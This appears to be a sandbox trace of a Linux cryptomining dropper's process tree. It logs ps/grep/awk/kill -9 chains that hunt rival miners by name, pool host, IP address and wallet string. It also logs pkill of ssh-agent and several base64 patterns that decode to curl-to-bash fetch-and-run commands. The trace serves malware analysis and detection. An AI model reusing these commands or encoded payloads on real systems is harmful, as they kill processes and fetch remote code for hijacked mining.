/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵
-
-
/bin/grepgrep -v apache22⤵
-
-
/bin/grepgrep -v postgresq12⤵
-
-
/bin/grepgrep -v kdevtmpfsi2⤵
-
-
/bin/grepgrep -v dblaunched2⤵
-
-
/bin/grepgrep -v atd2⤵
-
-
/bin/grepgrep -v dblaunchs2⤵
-
-
/bin/grepgrep -v dblaunch2⤵
-
-
/bin/grepgrep -v root2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep sync_supers2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grep
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16033⤵
-
-
/usr/local/bin/killkill -9 16033⤵
-
-
/usr/sbin/killkill -9 16033⤵
-
-
/usr/bin/killkill -9 16033⤵
-
-
/sbin/killkill -9 16033⤵
-
-
/bin/killkill -9 16033⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 16083⤵
-
-
/usr/local/bin/killkill -9 16083⤵
-
-
/usr/sbin/killkill -9 16083⤵
-
-
/usr/bin/killkill -9 16083⤵
-
-
/sbin/killkill -9 16083⤵
-
-
/bin/killkill -9 16083⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 108.174.197.762⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 192.236.161.62⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 88.99.242.922⤵
-
-
/bin/systemctlsystemctl stop c3pool_miner.service2⤵
- Enumerates kernel/hardware configuration
-
-
/usr/bin/pkillpkill -f pastebin2⤵
-
-
/usr/bin/pkillpkill -f ssh-agent2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 185.193.127.1152⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f monerohash2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f stratum2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f cryptonight2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./watchbog2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./A7mA5gb2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kacpi_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kswap_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kauditd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kpsmoused_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kseriod_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kthreadd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ksoftirqd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kintegrityd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jawa2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f oracle.jpg2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 188.209.49.542⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 181.214.87.2412⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f servim2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kblockd_svc2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f native_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ynn2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 65ccEJ72⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jmxx2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 2Ne80nA2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f sysstats2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f systemxlv2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f OIcJi1m2⤵
-
-
/usr/bin/pkillpkill -f biosetjenkins2⤵
-
-
/usr/bin/pkillpkill -f Loopback2⤵
-
-
/usr/bin/pkillpkill -f apaceha2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
-
-
/usr/bin/pkillpkill -f stratum2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mixnerdx2⤵
-
-
/usr/bin/pkillpkill -f performedl2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f JnKihGjn2⤵
-
-
/usr/bin/pkillpkill -f irqba2anc12⤵
-
-
/usr/bin/pkillpkill -f irqba5xnc12⤵
-
-
/usr/bin/pkillpkill -f irqbnc12⤵
-
-
/usr/bin/pkillpkill -f ir29xc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f conns2⤵
- Reads CPU attributes
-
-
